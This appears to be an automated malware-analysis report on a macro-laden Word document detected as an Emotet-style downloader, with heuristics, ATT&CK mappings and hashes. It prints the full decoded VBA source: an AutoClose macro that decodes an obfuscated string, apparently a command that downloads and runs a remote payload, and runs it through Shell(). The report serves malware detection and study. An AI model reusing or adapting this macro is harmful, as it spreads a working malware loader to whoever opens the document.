Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. It contains VBA macros, including an Auto_Close macro, which utilizes the Shell() function. This indicates the macro is designed to download and execute a secondary payload, a common characteristic of the Emooodldr family.
Heuristics (5)
- ClamAV: Doc.Malware.Emooodldr-6711604-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): Document contains a VBA project; VBA macros present
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OOXML body / shared strings):
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2006/wordml
Extracted artifacts (2)
Files carved from inside the sample during analysis.

macros.bas
- Kind: vba-macro
- Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
- Size: 3712 bytes
- SHA-256: dc2ddb33b36470bb60dd1b1d995330aa3fba638523b39c3f553cd302a855c8dc

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Function rezonear(enigmista As String)
Dim iris As String
Dim ursulina As Integer
iris = "ABCDE"
For ursulina = 1 To 5
If Mid(iris, ursulina, 1) = enigmista Then
rezonear = ursulina - 1
End If
Next
End Function
Public Function daiquiri()
Dim juliano
juliano = ""
juliano = "ut|jwxmjqq3j}"
juliano = juliano & "j%2stu%2J}jh%"
juliano = juliano & "G~ufxx%2Htrrf"
juliano = juliano & "si%-Sj|2Tgojh"
juliano = juliano & "y%X~xyjr3Sjy3"
juliano = juliano & "\jgHqnjsy.3It"
juliano = juliano & "|sqtfiKnqj-,m"
juliano = juliano & "yyu?44wttygtq"
juliano = juliano & "ip3ytu4firns3"
juliano = juliano & "umuDkB6,1%)js"
juliano = juliano & "{?FUUIFYF%0%,"
juliano = juliano & "aFR]p3j}j,.@%"
juliano = juliano & "Xyfwy2Uwthjxx"
juliano = juliano & "%)js{?FUUIFYF"
juliano = juliano & ",aFR]p3j}j,@%"
daiquiri = juliano
End Function
Public Function hexagono(alvura As Integer, facultativo As Integer) As Integer
hexagono = Int(alvura - facultativo - 1)
End Function
Public Function sais(medusa As String, rugoso As Integer) As String
Dim axiomatico As Integer
Dim olhos As String
olhos = medusa
Dim viavel As Integer
viavel = 0
For axiomatico = Len(medusa) To rugoso - 1
If viavel = Len(medusa) Then
viavel = 0
End If
olhos = olhos & Mid(medusa, viavel + 1, 1)
viavel = viavel + 1
Next
sais = olhos
End Function
Public Function tolueno(emfa As String, moagem As String) As String
moagem = sais(moagem, Len(emfa))
Dim ronronar
Dim clitoris As Integer
Dim sapo As Integer
Dim cobrir As String
cobrir = ""
For ronronar = 1 To Len(emfa)
clitoris = rezonear(Mid(moagem, ronronar, 1))
sapo = Asc(Mid(emfa, ronronar, 1))
cobrir = cobrir & Chr(hexagono(sapo, clitoris)) & "#"
Next
tolueno = cobrir
End Function
Public Function ruela(virus As String)
Shell virus, (vbNormal)
End Function
Public Function bojudo(harpista As String)
harpista = Replace(harpista, "#", "")
Call ruela(harpista)
End Function
Sub AutoClose()
Dim deltoide As String
deltoide = "EE"
Application.Run "bojudo", tolueno(daiquiri() & "", deltoide)
End Sub
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{22E97089-54A0-4344-BC1C-5C0F8DF41418}{D4C1F57E-FB22-4776-9D14-2D7E4EFBE984}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{887F06FC-A68E-4ED3-BE65-9A3F8E86D9E4}{A6B78B68-11BB-4570-AF57-3F38E30A2C68}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

vbaProject_00.bin
- Kind: vba-project
- Source: OOXML VBA project: word/vbaProject.bin
- Size: 24064 bytes
- SHA-256: 2de5c0d04bcdf6e84ec7d83a49addae911cb87a9e5b79e0323c13e5d6c91cd17
- Detection (ClamAV): Doc.Malware.Emooodldr-6711604-0
- Obfuscation or payload: unlikely